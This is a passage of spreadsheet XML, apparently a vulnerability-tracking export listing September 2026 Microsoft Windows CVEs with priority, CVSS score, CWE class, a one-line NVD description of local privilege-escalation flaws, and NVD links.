        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K52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24" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K52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27" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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32" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69541</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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0" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69576</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t>
        </is>
      </c>
    </row>
